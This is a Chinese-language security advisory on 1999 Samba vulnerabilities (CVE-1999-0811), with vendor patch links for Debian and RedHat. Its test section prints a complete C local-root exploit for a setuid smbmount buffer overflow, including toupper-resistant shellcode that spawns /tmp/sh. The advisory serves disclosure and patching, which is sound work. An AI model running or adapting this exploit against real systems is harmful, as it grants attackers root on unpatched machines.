安全研究

安全漏洞
Linux Samba软件包多个远程漏洞

发布日期:1999-07-21
更新日期:1999-07-21

受影响系统:
Samba Samba 2.0.4
    - Debian Linux 2.1
    - RedHat Linux 6.0
    - RedHat Linux 5.2
    - RedHat Linux 4.2
不受影响系统:
Samba Samba 2.0.5
    - Caldera  eServer 2.3.1
    - Caldera OpenLinux 2.3
描述:
BUGTRAQ  ID: 536
CVE(CAN) ID: CVE-1999-0811

Samba是在Unix类服务器上运行Netbios服务的程序。使用Samba软件包,可以方便地在Unix和Windows之间共享文件。

Samba软件包2.0.5以前版本中存在多个安全漏洞,第一个是nmbd拒绝服务攻击漏洞。第二个是smbd存在的一个缓冲区溢出漏洞,此漏洞在默认安装情况下不可利用,但如果系统管理员在smb.conf中设置了"message command"选项,攻击者可能利用此漏洞远程获取root权限。第三个是竞争条件漏洞如果smbmnt程序是以suid root属性安装的,攻击者可能利用此漏洞挂接文件系统中的任意目录。



<*来源:Andrew Tridgell (tridge@samba.org
  
  链接:https://www.redhat.com/support/errata/RHSA-1999-022.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Gerald Britton(gbritton@nih.gov) 提供了如下测试程序:


/*
The default parameters to the program
often work, however I have found that the offset parameter sometimes
varies wildly, values between -600 and -100 usually work though, a quick
shell script will scan through these.
*/

/*
** smbexpl -- a smbmount root exploit under Linux
**
** Author: Gerald Britton <gbritton@nih.gov>
**
** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
** The code does not do range checking when copying a username from
** the environment variables USER or LOGNAME.  To get this far into
** the code we need to execute with dummy arguments of a server and a
** mountpoint to use (./a in this case).  The user will need to create
** the ./a directory and then execute smbexpl to gain root.  This code
** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
** do a seteuid(getuid()) so /bin/sh on my system won't work.  Finally
** a "-Q" (an invalid commandline argument) causes smbmount to fail when
** parsing args and terminate, thus jumping into our shellcode.
**
** The shellcode used in this program also needed to be specialized as
** smbmount toupper()'s the contents of the USER variable.  Self modifying
** code was needed to ensure that the shellcode will survive toupper().
**
** The quick fix for the security problem:
**          chmod -s /sbin/smbmount
**
** A better fix would be to patch smbmount to do bounds checking when
** copying the contents of the USER and LOGNAME variables.
**
*/

#include <stdlib.h>
#include <stdio.h>

#define DEFAULT_OFFSET                 -202
#define DEFAULT_BUFFER_SIZE             211
#define DEFAULT_ALIGNMENT                 2
#define NOP                            0x90

/* This shell code is designed to survive being filtered by toupper() */

char shellcode[] =
        "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
        "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
        "\xeb\x05\xe8\xdb\xff\xff\xff"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int alignment=DEFAULT_ALIGNMENT;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) alignment = atoi(argv[3]);
  printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  fprintf(stderr,"Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) (ptr+alignment);
  for (i = 0; i < bsize-alignment; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + (128 - strlen(shellcode));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  setenv("USER",buff,1);
  execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0);
}

建议:
厂商补丁:

Debian
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

    源代码:

http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.diff.gz
       MD5 checksum: 1354ea63f79e7fa0b4b71685dbac118b
     http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.dsc
       MD5 checksum: e51aeb259913179b60dbddd0b9e70bf5

http://security.debian.org/dists/stable/updates/source/samba_2.0.5a.orig.tar.gz
       MD5 checksum: 497e5f98ed9b520b18e926ff2f7307ba


   Alpha 架构:

http://security.debian.org/dists/stable/updates/binary-alpha/samba-common_2.0.5a-1_alpha.deb
       MD5 checksum: 48b9651e2cefd6f6ad820ded9ebc9191

http://security.debian.org/dists/stable/updates/binary-alpha/samba_2.0.5a-1_alpha.deb
       MD5 checksum: 9bb86e810254fe59feb02e817815b64f

http://security.debian.org/dists/stable/updates/binary-alpha/smbclient_2.0.5a-1_alpha.deb
       MD5 checksum: 54a89ad98e1167a3265ff30881618b3f

http://security.debian.org/dists/stable/updates/binary-alpha/smbfs_2.0.5a-1_alpha.deb
       MD5 checksum: 596e22cdf0848fcffd1885f16b38cf83

http://security.debian.org/dists/stable/updates/binary-alpha/smbwrapper_2.0.5a-1_alpha.deb
       MD5 checksum: 5003fb2a3555daddd3d877529ac65e1e

http://security.debian.org/dists/stable/updates/binary-alpha/swat_2.0.5a-1_alpha.deb
       MD5 checksum: e99ec78abdac4a8ab1348773e3fa32cd

   Intel ia32 架构:

http://security.debian.org/dists/stable/updates/binary-i386/samba-common_2.0.5a-1_i386.deb
       MD5 checksum: eb8b9aa964912975db301f1e83919d36

http://security.debian.org/dists/stable/updates/binary-i386/samba_2.0.5a-1_i386.deb
       MD5 checksum: 799ab1a56dd726548c33a130edfb9231

http://security.debian.org/dists/stable/updates/binary-i386/smbclient_2.0.5a-1_i386.deb
       MD5 checksum: f5db7b12b67b24048d7ff915c9ec77ee

http://security.debian.org/dists/stable/updates/binary-i386/smbfs_2.0.5a-1_i386.deb
       MD5 checksum: b6e90edf5db22cf3952a01f726cb7dd7

http://security.debian.org/dists/stable/updates/binary-i386/smbwrapper_2.0.5a-1_i386.deb
       MD5 checksum: afabbae0e5ffdd03475a302586d75be5

http://security.debian.org/dists/stable/updates/binary-i386/swat_2.0.5a-1_i386.deb
       MD5 checksum: bd235e608944c7cd3cc7a17fceab0199

   Motorola 680x0 架构:

http://security.debian.org/dists/stable/updates/binary-m68k/samba-common_2.0.5a-1_m68k.deb
       MD5 checksum: 91d8b04d9ef76ca08fff5938007eb235

http://security.debian.org/dists/stable/updates/binary-m68k/samba_2.0.5a-1_m68k.deb
       MD5 checksum: 6404ca678a20ad17e44b6c74cc3182a1

http://security.debian.org/dists/stable/updates/binary-m68k/smbclient_2.0.5a-1_m68k.deb
       MD5 checksum: 37f0a04da50f9880b22cb3eaf27b2794

http://security.debian.org/dists/stable/updates/binary-m68k/smbfs_2.0.5a-1_m68k.deb
       MD5 checksum: 3685040bee6e01039f6588f97dab2c26

http://security.debian.org/dists/stable/updates/binary-m68k/smbwrapper_2.0.5a-1_m68k.deb
       MD5 checksum: 1a43221c50137cbf5d94f7ad90ab548e

http://security.debian.org/dists/stable/updates/binary-m68k/swat_2.0.5a-1_m68k.deb
       MD5 checksum: 7b5e610c9b044fe81ac66881ea59af64

   Sun Sparc 架构:

http://security.debian.org/dists/stable/updates/binary-sparc/samba-common_2.0.5a-1_sparc.deb
       MD5 checksum: f4713291f719de2f32543e0fc37506ea

http://security.debian.org/dists/stable/updates/binary-sparc/samba_2.0.5a-1_sparc.deb
       MD5 checksum: afb22260c07c60e4afd390bb3e108674

http://security.debian.org/dists/stable/updates/binary-sparc/smbclient_2.0.5a-1_sparc.deb
       MD5 checksum: 28b22378ddb79b05d29b4b4fac2038c4

http://security.debian.org/dists/stable/updates/binary-sparc/smbfs_2.0.5a-1_sparc.deb
       MD5 checksum: 8747b52257b451a1e19c93ea10048369

http://security.debian.org/dists/stable/updates/binary-sparc/smbwrapper_2.0.5a-1_sparc.deb
       MD5 checksum: 420bfe236fcc1591175acd7eb3ad83e0

http://security.debian.org/dists/stable/updates/binary-sparc/swat_2.0.5a-1_sparc.deb
       MD5 checksum: 38380d76284421c18e557e2d3a413a62

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-1999:022-02)以及相应补丁:
RHSA-1999:022-02:New Samba packages for Red Hat Linux 4.2, 5.2, 6.0
链接:https://www.redhat.com/support/errata/RHSA-1999-022.html

补丁下载:

Intel:

ftp://updates.redhat.com/6.0/i386/

samba-2.0.5a-1.i386.rpm
samba-client-2.0.5a-1.i386.rpm


Alpha:

ftp://updates.redhat.com/6.0/alpha/

samba-2.0.5a-1.alpha.rpm
samba-client-2.0.5a-1.alpha.rpm


SPARC:

ftp://updates.redhat.com/6.0/sparc/

samba-2.0.5a-1.sparc.rpm
samba-client-2.0.5a-1.sparc.rpm

可使用下列命令安装补丁:

rpm -Fvh [文件名]

浏览次数:11896
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障